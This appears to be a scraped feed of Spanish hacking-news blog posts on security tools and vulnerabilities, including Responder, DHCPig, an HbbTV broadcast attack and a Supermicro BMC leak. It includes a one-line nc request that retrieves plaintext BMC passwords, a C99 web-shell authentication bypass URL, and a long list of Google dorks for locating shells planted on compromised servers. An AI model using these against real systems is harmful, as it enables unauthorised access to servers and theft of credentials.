Quantcast
Channel: hackplayers
Viewing all 1656 articles
Browse latest View live

Analiza las bases de datos SQLite de tu smartphone Android con ADEL (Android Data Extractor Lite)

$
0
0
ADEL (Android Data Extractor Lite) es un script en Python que vuelca todas las bases de datos SQLite de un smartphone Android a disco y analiza los archivos en un workflow forense.

Si el smartphone no está conectado se puede especificar un directorio que contenga las bases de datos a analizar. Después, el script creará un informe XML claramente estructurado. Si conectas el smartphone necesitarás que esté rooteado y un kernel inseguro o un recovery personalizado.


Ejemplo de uso de ADEL con un smartphone conectado:
adel.py -d device -l 4

Ejemplo de uso de ADEL con copias de seguridad de bases de datos:
adel.py -d /home/user/backup -l 4


ADEL necesita una configuración predefinida para que cada dispositivo funcione correctamente. Esta configuración se debe añadir en el siguiente archivo:
xml/phone_configs.xml

Como ejemplo han añadido la configuración para el Samsung Galaxy S2 con Android 2.3.3. Más adelante seguirán añadiendo más configuraciones telefónicas.


En el estado actual de desarrollo, las bases de datos que se tratan y analizan son:

- información telefónica y de la tarjeta SIM (por ejemplo, IMSI y el número de serie)
- directorio telefónico y las listas de llamadas
- entradas del calendario
- mensajes SMS
- localizaciones GPS de diferentes fuentes en el smartphone

ADEL ahora usa una imagen de recuperación personalizada basada en el ClockworkMod-Recovery. Gracias a esto ya no es necesario modificar el kernel o el demonio adb. Por otra parte, en algunos smartphones más nuevos se puede cargar la recuperación modificada en la RAM mediante fastboot, por lo que no será necesario hacer cualquier cambio que persista en el smartphone.


Repositorio GitHub del proyecto:https://github.com/mspreitz/ADEL

Millones de televisiones inteligentes vulnerables al ataque del "botón rojo"

$
0
0
En un intento de llevar las funciones modernas de Internet de banda ancha (broadband) a la televisión abierta tradicional (broadcast), el consorcio Digital Video Broadcasting (DVB) presentó una especificación denominada Hybrid Broadcast Broadband-Television (HbbTV), que permite a los streams de difusión incluir contenido HTML incrustado que se renderiza por la televisión.

HbbTV (televisión conectada o híbrida) se ha convertido en un estándar de TV para transmitir contenidos adicionales de Internet por el televisor. Este sistema ya se encuentra ampliamente desplegado en Europa y recientemente ha sido adoptado como parte de la norma de televisión digital de Estados Unidos. 


Para recibir las páginas web especialmente diseñadas en formato CE-HTML se necesita una conexión a Internet y un televisor que soporte esta tecnología o un receptor de HbbTV adicional. La mayoría de estos dispositivos incluyen en sus mandos de control remoto un "botón rojo" para acceder a estos servicios interactivos.
 

Sin embargo este "botón rojo" podría ser también una puerta para usuarios malintencionados. Yossi Oren y Angelos Keromytis de la Universidad de Columbia han publicado un paper en el que demuestran que los sistemas de broadband y broadcast se combinan de forma insegura.

El problema principal es que cuando se inserta contenido web en un stream de datos de broadcast no está enlazado a ningún servidor web por lo que no puede establecer de forma estándar una política del mismo origen de forma estándar. La especificación HbbTV sugiere que sea el propio stream de broadcast quien defina su propio origen web configurando el nombre de dominio deseado (propiedad simple_application_boundary_descriptor en el IAT). Por lo tanto, si el propio proveedor o broadcaster puede especificar cualquier origen, un proveedor malicioso podrá también inyectar cualquier script de su elección en cualquier sitio web de su elección.
 
Aprovechándose de ésto y mediante un ataque MITM a gran escala, se inyectan comandos sobre la base de la frecuencia de radio (RF) y, junto con los streams de audio y video, se puede incluir una aplicación HbbTV maliciosa.

Aunque los autores de esta técnica intentaron una divulgación responsable ante el organismo de normalización, el ataque fue visto como demasiado caro y con limitada rentabilidad de los atacantes. Sin embargo en su artículo se demuestra que la complejidad técnica y el presupuesto requeridos son bajos, por lo que este ataque es práctico y realista, sobre todo en las zonas con alta densidad de población -en una densa zona urbana, un atacante con un presupuesto de alrededor de 400€ puede dirigirse a más de 20.000 dispositivos en un solo ataque-.

Además, cuando una aplicación HbbTV ha comenzado a ejecutarse no hay manera estándar de pararla, al menos que se cambie de canal, se apague la televisión o se desactive el soporte HbbTV en su totalidad. Para más inri, estos ataques son casi "invisibles": las aplicaciones HbbTV se ejecutan en segundo plano sin el conocimiento ni el consentimiento de los usuarios y el atacante no necesita usar una IP o un DNS por lo que la única manera de cogerle sería triangulando la señal maliciosa...

Fuentes:
- Yossef Oren, Angelos D. Keromytis: From the Aether to the Ethernet - Attacking the Internet using Broadcast Digital Television
- Red Button Flaw Exposes Major Vulnerability In Millions of Smart TVs
- Millions of Smart TVs Vulnerable To 'Red Button' Attack
- A New Vulnerability Could Leave Smart TVs Exposed

Inanición de redes con DHCP (DHCP Starvation) mediante DHCPig

$
0
0
En un ataque de agotamiento DHCP (DHCP Starvation) un usuario malicioso inunda con peticiones DHCP el servidor utilizando diferentes direcciones MAC. Con esto puede llegar a agotar por completo el espacio de direcciones asignables por los servidores DHCP por un período indefinido de tiempo. Los clientes de la red de la víctima entonces no obtendrán automáticamente una IP para acceder a la red por lo que este ataque podría ser clasificado como una denegación de servicio.

Este tipo de ataque se puede lograr fácilmente con herramientas como Gobbler, Yersinia, Metasploit o, como se muestra en el siguiente vídeo, mediante DHCPig, un script en Python que utiliza Scapy y que es capaz de consumir todas las IPs disponibles en la LAN, liberar cualquier IP en uso en la red y mandar ARPs para que los sistemas Windows permanezcan offline:
 

Responder: despliega servidores falsos en la red para robar contraseñas

$
0
0
Responder de SpiderLabs es una herramienta para la obtención pasiva de credenciales en la red.

Todo está escrito en Python pensando en la portabilidad, por lo que no será necesario instalar ninguna herramienta extra ni añadir ningún módulo adicional.

Lo ejecutas y escucha peticiones NBT-NS (NetBIOS Name Service), LLMNR (Link-local Multicast Name Resolution) y mDNS (multicast Domain Name System) y envenena al emisor. Cuando detecta una petición basada en el nombre del sufijo (ver: http://support.microsoft.com/kb/163409) solicitará y almacenará las credenciales de la víctima.

Responder además viene con varios servidores de autenticación falsos (HTTP/SMB/MSSQL/FTP/LDAP) que soportan NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP y autenticación HTTP básica.

Veámos un poco su facilidad de uso en una máquina virtual con Kali:

Instalación:
root@kali:~# git clone https://github.com/SpiderLabs/Responder.git

root@kali:~# cd Responder/
root@kali:~/Responder# ls
Certs                FixInternet.exe   LDAPPackets.py       Responder.py
CHANGELOG            HTTPCookies       odict.py             SMBPackets.py
Denied.html          HTTPPackets.py    RAPLANMANPackets.py  SMBRelay.py
DHCP.py              HTTPProxy.py      README.md            SMTPPackets.py
Fingerprint.py       Icmp-Redirect.py  RelayPackets.py      SQLPackets.py
FingerprintRelay.py  IMAPPackets.py    Responder.conf

Ejemplo de uso:
root@kali:~/Responder# python Responder.py -i 192.168.142.128 -I eth0 -d SMB -b 0 -r 1 -v
NBT Name Service/LLMNR Responder 2.0.
Please send bugs/comments to: lgaffie@trustwave.com
To kill this script hit CRTL-C

[+]NBT-NS, LLMNR & MDNS responder started
[+]Loading Responder.conf File..
Global Parameters set:
Responder is bound to this interface: eth0
Challenge set: 1122334455667788
WPAD Proxy Server: False
WPAD script loaded:  function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
HTTP Server: ON
HTTPS Server: ON
SMB Server: ON
SMB LM support: False
Kerberos Server: ON
SQL Server: ON
FTP Server: ON
IMAP Server: ON
POP3 Server: ON
SMTP Server: ON
DNS Server: ON
LDAP Server: ON
FingerPrint hosts: False
Serving Executable via HTTP&WPAD: OFF
Always Serving a Specific File via HTTP&WPAD: OFF

Captura de hash SMB-NTLMv2:
LLMNR poisoned answer sent to this IP: 192.168.142.1. The requested name was : servidor1.
[+]WPAD (no auth) file sent to: 192.168.142.1

LLMNR poisoned answer sent to this IP: 192.168.142.1. The requested name was : servidor1.
[+]SMB-NTLMv2 hash captured from :  192.168.142.1
[+]SMB complete hash is : prueba::DOMINIO:1122334455667788:1D863E3C5746398740BBD893B1F7B43B:01010000000000684CF017068466D9E239FD90000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E0061006C000500160C006F00630061006C000073006D006200310032002E00680030003000000000000000010000000020009E00000C5EC24000A0F2F627F8D95AAB1740E16A2D24BE1C9B0E222697E60D026DBF5C5C006C006F00634C3451030A001000000000000000000000000000000000000900120063006900660073002F006500760061006E000000000000000000

Captura de credenciales FTP:
[[+]FTP User:  test
[+]FTP Password is:  test

Captura de credenciales HTTP/HTTPS:
[+]HTTP-User & Password: test:test
[+]HTTP GET request from : 192.168.142.1. The HTTP URL requested was: /favicon.ico
[+]HTTP-User & Password: test:test
[+]HTTP GET request from : 192.168.142.1. The HTTP URL requested was: /favicon.ico
[+]HTTP-User & Password: test:test

[+]HTTPS-User & Password: test:test

Captura LDAP:
[LDAP]Clear Text User & Password is: :

Repositorio en Github:https://github.com/Spiderlabs/Responder

Pompem - Exploit Finder

$
0
0
Pompem es una herramienta de código abierto que está diseñada para automatizar la búsqueda de vulnerabilidades en las principales bases de datos. Desarrollada en Python, tiene un sistema de búsqueda avanzada, facilitando así el trabajo de pentesters y hackers éticos. En su versión actual, realiza búsquedas en bases de datos: Exploit-db, 1337 días, Packetstorm Security..

root@kali:~# git clone https://github.com/rfunix/Pompem.git Pompem-dev
root@kali:~# cd Pompem-dev/
root@kali:~/Pompem-dev#
root@kali:~/Pompem-dev# python pompem.py -s Zabbix --html


Una vulnerabilidad en Gmail dejó expuestas todas las direcciones de correo durante años

$
0
0
El investigador de seguridad Oren Hafif reveló que había descubierto una vulnerabilidad en Gmail que durante años podía haber dejado expuestos todos los nombres de las direcciones de correo electrónico de todos los usuarios, haciéndolas susceptibles a phishing, spam y a intentos de acceso no autorizados.

La metodología usada por Hafif explotaba la opción que permite que los usuarios puedan autorizar que otras terceras partes accedan a sus cuentas, y sólo tenía que modificar una URL que se genera cuando un usuario no autorizado intenta ganar la entrada a una cuenta utilizando la función de delegación.

Al cambiar un carácter en la URL, Hafif descubrió que la página mostraba una dirección de correo electrónico diferente, junto con el mensaje de "decline". Luego, automatizando el proceso con DirBuster, fue capaz de obtener casi 40.000 direcciones de correo electrónico en sólo dos horas.

"Yo podría haber hecho ésto potencialmente sin fin", dice Hafif. "Tengo todas las razones para creer que podría haber sido extraídas todas las direcciones de Gmail."

Hafif reveló la vulnerabilidad de Gmail de forma privada, y el fallo ya se ha mitigado antes de esta revelación pública. Gmail dice que en ningún momento hubo riesgo de exposición de las contraseñas pero sin embargo, la extracción de direcciones de correo electrónico con el método de Hafif podría haber sido un negocio redondo para spammers y estafadores.


Hafif publicó también el siguiente video para demostrar la técnica:



Fuente:Gmail Vulnerability Could Have Exposed Every Email Address

PayPub: fugas de información a cambio de bitcoins

$
0
0
Las fugas de información como las de Wikileaks y Snowden u otras como las que vemos continuamente en Pastebin podrían empezar a realizarse mediante una herramienta que permite el intercambio de filtraciones a cambio de bitcoins.

Esa herramienta de momento es un prototipo llamado PayPub, desarrollado por Amir Taaki y Peter Todd para facilitar un nuevo modelo anónimo y con ánimo de lucro que puede despertar un mercado negro descentralizado de información secreta.

"Desde hace tiempo he querido hacer un mercado en el que la gente pueda filtrar información y otros puedan pagar por esas fugas", dice Amir, que ha ganado notoriedad por su trabajo en otros proyectos bitcoin radicalmente anarquistas. "Los filtradores están asumiendo un riesgo, y deben ser recompensados."

La gran diferencia con otros sistemas de filtraciones es que PayPub no es una plataforma o un sitio web donde dejar la información, los filtradores han de elegir la forma de publicar anónimamente su información: un sitio en la red Tor, subir un torrent a The Pirate Bay, un mensaje cifrado mediante una cuenta de correo electrónico temporal, etc.


Imagina que quieres liberar mediante PayPub un archivo a un grupo a una persona, a cambio de BTC. Divides el archivo en 100 partes y las cifras mediante un hash basado en los originales:

- Cada parte (chunk) es hasheada
- Cada hash es una clave privada Bitcoin
- Obtenemos también las claves públicas
- Cada clave pública es la dirección para liberar una parte
- Hasheamos la clave pública para conseguir un secreto
- Cada parte es cifrada usando el secreto con AES256

El gasto de esa dirección significa que se *debe* revelar la clave pública. La revelación de la clave pública significa que revelan el secreto.
Y así, la parte en concreto se puede descifrar.

Lo que hace PayPub es revelar un parte seleccionada al azar de los archivos filtrados como si fuera una vista previa, junto con un precio sugerido. Si los compradores potenciales están interesados ​​en ver más, pueden utilizar el programa para generar direcciones bitcoin a las que pueden pagar a cambio de revelar más parte de los archivos.

De momento se trata de una herramienta en línea de comandos, si bien más adelante es posible que se desarrolle un interface gráfico que facilite y propague su uso...

Proyecto GitHub:
https://github.com/genjix/pp/blob/master/EXPLANATION
Fuente:http://www.wired.com/2014/06/paypub/

Descarga gratis los 100 mejores libros de hacking de Raj Chandel

$
0
0
Impresionante recopilatorio con el top 100 de libros de hacking del blog de Raj Chandel:
  1. Kali Linux – Assuring Security by Penetration Testing
  2. Network Analysis Using Wireshark Cookbook
  3. Computer Security Handbook, 6th Edition
  4. iPad and iPhone Kung Fu: Tips, Tricks, Hints, and Hacks for iOS 7
  5. Android Security Cookbook
  6. Penetration Testing with BackBox
  7. Kali Linux Social Engineering
  8. Computer Forensics with FTK
  9. Android Hacker’s Handbook
  10. Practical Reverse Engineering
  11. Malware Forensics Field Guide for Linux Systems
  12. Learning Pentesting for Android
  13. The Hacker Playbook: Practical Guide To Penetration Testing
  14. Learning Metasploit Exploitation and Development
  15. Web Penetration Testing with Kali Linux
  16. Metasploit Penetration Testing Cookbook Combo Pack (1st+2nd Edition)
  17. Hacking Point of Sale: Payment Application Secrets, Threats, and Solutions
  18. The Browser Hacker’s Handbook 2014
  19. Hacking Politics
  20. The Basics of Web Hacking Tools and Techniques to Attack the Web
  21. Investigative Computer Forensics The Practical Guide for Lawyers, Accountants, Investigators, and Business Executives
  22. The Basics of Hacking and Penetration Testing, Second Edition
  23. Professional Penetration Testing
  24. The State of the Art in Intrusion Prevention and Detection
  25. Cyber Warfare: Techniques, Tactics and Tools for Security Practitioners (Second Edition)
  26. Hacking with Kali: Practical Penetration Testing Techniques
  27. Wireshark 101: Essential Skills for Network Analysis
  28. Hacking Raspberry Pi 2013
  29. Blackhatonomics: An Inside Look at the Economics of Cybercrime
  30. Hacking and Securing iOS Applications
  31. iOS Hacker’s Handbook
  32. Windows Forensics Analysis Toolkit
  33. Linux Server Hacks
  34. Violent Python – A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers
  35. Instant Penetration Testing: Setting Up a Test Lab How-to
  36. Coding Freedom: The Ethics and Aesthetics of Hacking
  37. The Basics of Hacking and Penetration Testing
  38. The Unrevealed Secrets of Hacking and Cracking
  39. Wireshark Network Analysis – Second Edition
  40. The Basics of Information Security
  41. Secrets of Network Cartography
  42. Seven Deadliest Network Attacks
  43. Metaprogramming Ruby: Program Like the Ruby Pros
  44. Next-Generation Firewalls for Dummies
  45. The Rootkit Arsenal: Escape and Evasion in the Dark Corners of the System
  46. Hacking Exposed 7: Network Security Secrets & Solutions, Seventh Edition
  47. Reversing: Secrets of Reverse Engineering
  48. Unauthorised Access – Physical Penetration Testing For IT Security Teams
  49. Advanced Penetration Testing for Highly-Secured Environments
  50. Gray Hat Python: Python Programming for Hackers and Reverse Engineers
  51. Network Forensics Tracking Hackers through Cyberspace
  52. Hackin9 Guide to BackTrack
  53. Coding For Penetration Testers
  54. Practical Malware Analysis
  55. Exploiting Software: How to Break Code
  56. Hacker’s Delight
  57. Hackers Heroes of the Computer Revolution
  58. Facebook Hacking E-Book (Free Download)
  59. Hacking The Next Generation
  60. 24 Deadly Sins of Software Security
  61. The Crypter Blue Print
  62. Google Hacking for Penetration Tester
  63. Wireless Kungfu Networking & Hacking
  64. Kingpin: How One Hacker Took Over the Billion-Dollar Cybercrime Underground
  65. Dark Market- CyberThieves CyberCrime and you
  66. Policing Cyber Crime
  67. Metasploit (The Penetration Tester’s Guide)
  68. The Art of Deception 
  69. Ghost in the Wires (Free Download)
  70. BackTrack 5 Wireless Penetration Testin
  71. Windows 7 Tweaks (Best Book for Windows 7 Lovers) 
  72. Free Download Hacker Highschool (13 Books)
  73. Hacking Beware
  74. Batch File Programming
  75. Windows 7 Bible
  76. Two Beginner Guide of Hacking
  77. Evolution of Cyber Crime
  78. Buffer Overflow Attacks
  79. Hacking for Dummies
  80. The CEH Prep Guide
  81. SQL Injection Attack and Defense
  82. Guide to Computer Forensics and Investigation
  83. Stealing the Network (E-Book)
  84. Cyber Forensics (E-Book)
  85. Gmail Hacking (New Hacking E-Book)
  86. Hacking Computer forensics Exposed
  87. You Tube Hacking (My New E-Book)
  88. Footprinting (My New Hacking E-Book)
  89. Hacking Exposed (E-Book)
  90. Forensic Computer Crime Invsestigation
  91. Window Based Command Line Tools (E Book)
  92. Hacking GPS (E- Book)
  93. Window Based GUI Tools (E Book)
  94. Hacker Cracker
  95. Penetration Testing Procedures & Methodologies
  96. CEH V8 Course + Lab Manual
  97. Secure Network Infrastructures by EC-Council
  98. Penetration Testing Communication Media Testing
  99. Computer Forensics Investigating Wireless Networks and Devices
  100. Computer Forensics – Investigating Data and Image Files
Fuente:http://www.hackingarticles.in/free-download-top-100-hacking-books/

Ropa "anti-drones" contra cámaras térmicas

$
0
0
En septiembre de 2013, en la tienda del Museo de la ciudad de Nueva York, se presentó la Tienda de Regalos de Privacidad (Privacy Gift Shop) en la que cada producto es un proyecto, una investigación sobre el futuro de la vida con la vigilancia.

La tienda ha ido "moviéndose" por distintas ciudades (Tel Aviv, Viena, Amsterdam) y presentando sus productos. De momento en su web no hay muchos, pero llama la atención una funda de móvil para bloquear todas las señales inalámbricas (OFF Pocket) y una colección de ropa de sigilo (Stealth Wear) que protege contra la captación de imágenes térmicas, una tecnología de vigilancia utilizada ampliamente por drones militares para (sobretodo) apuntar a la gente. Sus resultados son bastante impresionantes:

Más de 32.000 placas bases de Supermicro exponen las contraseñas en claro en Internet

$
0
0
Zachary Wikholm, consultor de seguridad de la empresa CARInet, ha descubierto un fallo de seguridad en las placas base de Supermicro que compromete la seguridad de miles de servidores.

Concretamente el problema está en el interfaz IPMI del controlador de gestión de placa base (BMC), accesible por el puerto 49152 y encargado de supervisar el estado físico dando información de la temperatura, disco, rendimiento de memoria y velocidad del ventilador, y que además permite obtener un archivo binario PSBlock que almacena en texto claro las contraseñas de inicio de sesión remoto:

nc 49152
GET /PSBlock


El problema se acrecienta como siempre cuando el puerto 49152 de más de 32.000 servidores (según Shodan) es accesible desde Internet.

¡La vida es fácil!

Fuentes:
- CARISIRT: Yet Another BMC Vulnerability (And some added extras)
- BMC Vulnerability Exposes Admin Passwords in Plain Text
- BMC Vulnerability Exposes Admin Password of 32,000 Servers in Plaintext on the Internet
- 32,000 Supermicro motherboard passwords exposed as plain text
- At least 32,000 servers broadcast admin passwords in the clear, advisory warns

Hooker – análisis dinámico de aplicaciones Android

$
0
0
Hooker es un proyecto de código abierto para el análisis dinámico de aplicaciones Android. Este proyecto facilita varias herramientas y aplicaciones que pueden usarse para interceptar y modificar cualquier llamada al API hecha por la aplicación objetivo. Aprovecha el framework Android Sustrate para interceptar esas llamadas y agregar toda su información contextual (parámetros, valores devueltos, ...) en una base de datos con búsqueda elasticsearch. Se pueden utilizar varios scripts en Python para automatizar la ejecución de un análisis con el fin de recolectar cualquier llamada al API realizada por un conjunto de aplicaciones.

Hooker está compuesto de varios módulos:

- APK-instrumenter: la aplicación que debe instalarse antes de realizar un análisis en un dispositivo Android (por ejemplo, un emulador).
- hooker_xp: es una herramienta en Python para controlar el dispositivo Android y preparar la instalación y ejecución de una aplicación en él.
- hooker_analysis: es un script en Python para recoger los resultados almacenados en la base de datos elasticsearch.
- tools/APK-contactGenerator: es una aplicación Android instalada por hooker_xp para inyectar datos falsos de contactos.
- tools/apk_retriever: es una herramienta en Python que puede usarse para descargar APKs desde varios markets online.
- tools/emulatorCreator: es un script que puede usarse para preparar un emulador.
 

Descarga Hooker

Verificar ASLR, DEP y SafeSEH con Powershell

$
0
0
Eric Gruber de NetSPI ha publicado un interesante script en Powershell que comprueba rápidamente si una DLL o EXE ha sido compilado con ASLR (Address Space Layout Randomization), DEP (Data Execution Prevention) y SafeSEH (Structured Exception Handling).

Existen herramientas como PEStudio, CFFExplorer, Windbg con plugins e Immunity Debugger con mona.py que ya lo hacen, pero no son tan intuitivos cuando se escanean múltiples ficheros.

PEChecker utiliza PowerShell para examinar el encabezado PE (Portable Executable), concretamente el member DLLCharacteristic, un valor hexadecimal que provee información de las opciones con las que se ha compilado un fichero: ASLR (IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE), DEP (IMAGE_DLLCHARACTERISTICS_NX_COMPAT) y SafeSEH (IMAGE_DLLCHARACTERISTICS_NO_SEH) con valores 140 o 400 si han sido o no activados respectivamente.

El código fuente está disponible en GitHub (https://github.com/NetSPI/PEchecker) y su uso es muy sencillo:

Chequear un único fichero:
C:\PS> ./PEchecker.ps1 -file C:\Windows\System32\kernel32.dll

Chequear un directorio de DLLs y EXEs:
C:\PS> ./PEchecker.ps1 -directory C:\Windows\System32\


Chequear un directorio de DLLs y EXEs recursivamente:
C:\PS> ./PEchecker.ps1 -directory C:\Windows\System32\ -recursive

Chequear DLLs y EXEs pero sólo que no hayan sido compiladas con ASLR:
C:\PS> ./PEchecker.ps1 -directory C:\Windows\System32\ -recursive -OnlyNoASLR

Chequear DLLs y EXEs pero sólo que no hayan sido compiladas con DEP:
C:\PS> ./PEchecker.ps1 -directory C:\Windows\System32\ -recursive -OnlyNoDEP

Chequear DLLs y EXEs pero sólo que no hayan sido compiladas con SafeSEH:
C:\PS> ./PEchecker.ps1 -directory C:\Windows\System32\ -recursive -OnlyNoSafeSEH

Muestra los resultados con el nombre de ruta completo:
C:\PS> ./PEchecker.ps1 -directory C:\Windows\System32\ -recursive -FullPath

Exporta los resultados a CSV:
C:\PS> ./PEchecker.ps1 -directory C:\Windows\System32\ -recursive | Export-CSV file.csv

Muestra los resultados en una tabla:
C:\PS> ./PEchecker.ps1 -directory C:\Windows\System32\ -recursive | Format-Table

Muestra los resultados en una tabla y los ordena por columna:
C:\PS> ./PEchecker.ps1 -directory C:\Windows\System32\ -recursive | Format-Table | sort ASLR

Muestra los resultados en una lista:
C:\PS> ./PEchecker.ps1 -directory C:\Windows\System32\ -recursive | Format-List

Fuente:https://www.netspi.com/blog/entryid/232/verifying-aslr-dep-and-safeseh-with-powershell

¿Está el shell C99? - Sí, pase, pase...

$
0
0
Si eres de los que va dejando "niditos de amor" en servidores web vulnerables con el shell C99.php, que sepas que esas pequeñas puertecitas están abiertas también para todo aquel que quiera entrar.

Matthew Bryant nos recuerda que el shell C99 tiene un backdoor debido a una vulnerabilidad en el comando extract():
//Highlight-code colors
$highlight_background = "#c0c0c0";
$highlight_bg         = "#FFFFFF";
$highlight_comment    = "#6A6A6A";
$highlight_default    = "#0000BB";
$highlight_html       = "#1300FF";
$highlight_keyword    = "#007700";
$highlight_string     = "#000000";
 
@$f = $_REQUEST["f"];
<strong>@extract($_REQUEST["c99shcook"]);</strong>
 
//END CONFIGURATION
 
//                 \/    Next code isn't for editing    \/
$tmp = array();

Esta línea permite sobrescribir cualquier variable usando un array:
@extract($_REQUEST["c99shcook"]);

Por lo que si echamos un vistazo al siguiente código:
 ($login) {
    if (empty($md5_pass)) {
        $md5_pass = md5($pass);
    }
    if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {
        if ($login_txt === false) {
            $login_txt = "";
        } elseif (empty($login_txt)) {
            $login_txt = strip_tags(ereg_replace("&amp;nbsp;|&lt;br&gt;", "", $donated_html));
        }
        header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\"");
        header("HTTP/1.0 401 Unauthorized");
        exit($accessdeniedmess);
    }
}

Podemos cambiar la URL a:

http://127.0.0.1/c99.php?c99shcook[login]=0 

y adiós a la autenticación!!


Esto por supuesto podemos hacerlo también mediante una petición POST o mediante una cookie.

Ahora abre los ojos, mira a Internet al son de Google Dorks y descubrirás la cantidad de puertas que otros dejaron abiertas...
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.php
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team" inurl:c99
inurl:c99.php
allinurl: c99.php
inurl:c99.php
inurl:"c99.php" c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
c99shell powered by admin
inurl:"/c99.php"
inurl:c99.php
c99 shell v.1.0 (roots)
inurl:c99.php
allintitle: "c99shell"
inurl:"c99.php
allinurl: "c99.php"
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
allinurl: "c99.php"
inurl:c99.php
inurl:"c99.php" c99shell
inurl:"/c99.php
inurl:/c99.php+uname
allinurl:"c99.php"
inurl:"c99.php"
allinurl:c99.php
"inurl:c99..php"
c99shell [file on secure ok ]?
powered by Captain Crunch Security Team
allinurl:c99.php
"c99.php" filetype:php
allinurl:c99.php
inurl:c99.php
allinurl:.c99.php
"inurl:c99.php"
c99. PHP-code Feedback Self remove
allinurl:c99.php
download c99.php
allinurl:c99.php
inurl:c99.php
allinurl: "c99.php"
intitle:C99Shell v. 1.0 pre-release +uname
allinurl:"c99.php"
inurl:c99.php
safe-mode: off (not secure) drwxrwxrwx c99shell
c99.php download
inurl:c99.php
c99shell filetype:php -echo
inurl:"c99.php"
inurl:c99.php uid=0(root)
allinurl:c99.php
inurl:"/c99.php" intitle:"C99shell"
C99Shell v. 1.0 pre-release build #5
--[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetype:php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
intitle:!C99Shell v. 1.0 pre-release build #16! root
!C99Shell v. 1.0 pre-release build #5!
inurl:"c99.php"
C99Shell v. 1.0 pre-release build #16!
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
allinurl: "c99.php"
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell "Software: Apache"
allinurl: c99.php
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
intitle:c99shell uname -bbpress
intitle:"index.of" c99.php
inurl:admin/files/
intitle:"index of /""c99.php"
intitle:"index of" intext:c99.php
intitle:index.of c99.php
intitle:"index of" + c99.php
intitle:index/of file c99.php
intitle:index/of file c99.php
index of /admin/files/
intitle:"Index of/"+c99.php
c99.php "intitle:Index of "
intitle:index.of c99.php
img/c99.php
intitle:index.of c99.php
img.c99.php
intitle:"Index of/"+c99.php
"index of /" c99.php
c99.php
intitle:"Index of" c99.php
"index of" c99.php
"Index of/"+c99.php

Un gran dirigible con el mensaje "Espionaje ilegal abajo" sobrevuela el Centro de Datos principal de la NSA

$
0
0
Una alianza de defensores de la privacidad digital y activistas, incluyendo el Electronic Frontier Foundation (EFF), el Centro de la Décima Enmienda, Greenpeace y otros grupos de libertades civiles han hecho sobrevolar recientemente un gigantesco dirigible por encima del principal datacenter de la NSA en Utah (en la imagen de la derecha).

Se trata de una gran medida de protesta contra los programas de vigilancia de masas de la Agencia y para anunciar el lanzamiento de Stand Against Spying, un sitio web que clasifica a los miembros del Congreso por su apoyo u oposición a la reforma de la NSA.

Y qué decir, pues que a nosotros nos parece una idea estupenda y como aquí también queremos trolear a la NSA ya estamos preparando nuestras armas de protesta, lol!

the great hacktivist Tool.
first simulation: flying over suspicious datacenter.

10 aplicaciones que deberías llevar en tu USB

$
0
0
En EFYTimes se suelen publicar pequeños recopilatorios, muchos de ellos bastante interesantes como el que os traducimos a continuación. Se trata de 10 aplicaciones indispensables que todo buen informático debería llevar consigo en un pendrive USB. Echadle un vistazo y comentarnos si cambiaríais alguna del listado o si echáis en falta alguna más:

1.FreeOTFE
 

Programa de cifrado de disco al vuelo (OTFE) de código abierto para PCs con Microsoft Windows que crea unidades virtuales o discos, mediante el cual se cifra automáticamente todo lo que se escribe a disco antes de ser almacenado.

2.Spybot - Search & Destroy Portable
 

Programa de eliminación de adware y spyware. Escanea el disco y/o la memoria RAM en busca de software malicioso en el ordenador.

3.ClamWin Portable

 
Antivirus ClamWin portable. ClamWin es un antivirus de código abierto para Microsoft Windows. Proporciona una interfaz gráfica de usuario al motor Clam AntiVirus.

4.Recuva


Software de recuperación de datos para Windows que es capaz de recuperar archivos que han sido eliminados permanentemente y marcados por el sistema operativo como espacio libre. El programa también puede ser utilizado para recuperar archivos borrados de unidades flash USB, tarjetas de memoria o reproductores MP3.

5.VLC Media Player Portable


Reproductor VLC empaquetado para ser portable. Es un reproductor multimedia y servidor de streaming de medios libre y de código abierto, multiplataforma y que soporta varios métodos de compresión de audio y vídeo y formatos de archivo, incluyendo DVD-Video, CD de vídeo y protocolos de streaming.

6.GIMP Portable

 
Editor de imágenes empaquetado como una aplicación portable. Es casi un estándar para el retoque y edición de imágenes, dibujo libre, cambio de tamaño, recorte, fotomontajes, convertir entre diferentes formatos de imagen y otras tareas más especializadas.

7.LibreOffice

 
Paquete de código libre y abierto, que comprende aplicaciones para hacer procesamiento de textos, hojas de cálculo, presentaciones, diagramas y dibujos, mantener bases de datos y componer fórmulas matemáticas.

8.7-Zip Portable

 
7-Zip empaquetado como una aplicación portable. Utiliza el formato de archivo 7z, pero sabe leer y escribir otros formatos de compresión.

9.KeePass Classic Password Safe Portable

 
